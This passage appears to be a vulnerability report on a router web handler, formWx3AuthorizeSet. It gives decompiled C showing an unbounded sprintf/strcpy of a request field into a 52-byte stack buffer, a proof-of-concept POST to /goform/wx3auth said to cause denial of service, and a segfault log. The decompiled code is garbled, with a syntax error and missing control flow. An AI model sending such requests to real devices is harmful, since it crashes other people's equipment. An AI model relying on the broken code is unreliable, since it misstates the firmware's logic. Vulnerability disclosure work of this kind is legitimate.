

```
int __fastcall formWx3AuthorizeSet(int a1)
   char v3[52]; // [sp+10h] [bp-5234h] BYREF
char v4[20]; // [sp+110h] [bp-5134h] BYREF
_DWORD v5[2]; // [sp+124h] [bp-5120h] BYREF
_BYTE v6[20736]; // [sp+12ch] [bp-5118h] BYREF
char *v7; // [sp+522ch] [bp-18h]
char *extend_value; // [sp+5230h] [bp-14h]
char *data_value; // [sp+5234h] [bp-10h]
    v5[0] = 0;
    LOWORD(v5[1]) = 0;
    data_value = (char *)get_value_from_web(a1, (int)"data", (int)&unk_83034);
extend_value = (char *)get_value_from_web(a1, (int)"extend", (int)&unk_83034);
sub_6B550((const char *)(a1 + 48), v4);
    memset(v6, 0, sizeof(v6));
    ethaddr_aton(v4, v5);
memcpy(v6, v5, 6u);
    v6[12] = 6;
v6[13] = 2;
    printf("%s,%d: extend = %s\n", "formWx3AuthorizeSet", 938, extend_value);
if (!strstr(extend_value, "pc") || !*data_value)
    return sub_25C58(a1, 200, &unk_83034, 0);
printf("url:%s\n", data_value);
v7 = 0:
     tpi_ap_portal_handle(3, v6);
     v7 = 0;
    v7 = strstr(data_value, "data=");
if ( v7 && v7 != (char *)-5 && v7[5] )
        sprintf(v3, "http://%s", v7 + 5);
return sub_25C58(a1, 302, &unk_83034, v3);
     v7 = strstr(data_value, "http://");
       return sub_25C58(a1, 200, &unk_83034, 0);
strcpy(v3, data_value);
   return sub_25C58(a1, 302, &unk_83034, v3);
```

## **POC**

This POC can result in a Dos.

```
POST /goform/wx3auth HTTP/1.1
Host: 192.168.204.133
Content-Length: 43625
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.204.133
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Refener: http://192.168.204.133/system_hostname.asp?version=1487847846
Accept-Language: zh-CN,zh;q=0.9
Cookie: blanguage=cn; password=jbl1qw; user=
Connection: close
```



qemu: uncaught target signal 11 (Segmentation fault) - core dumped Segmentation fault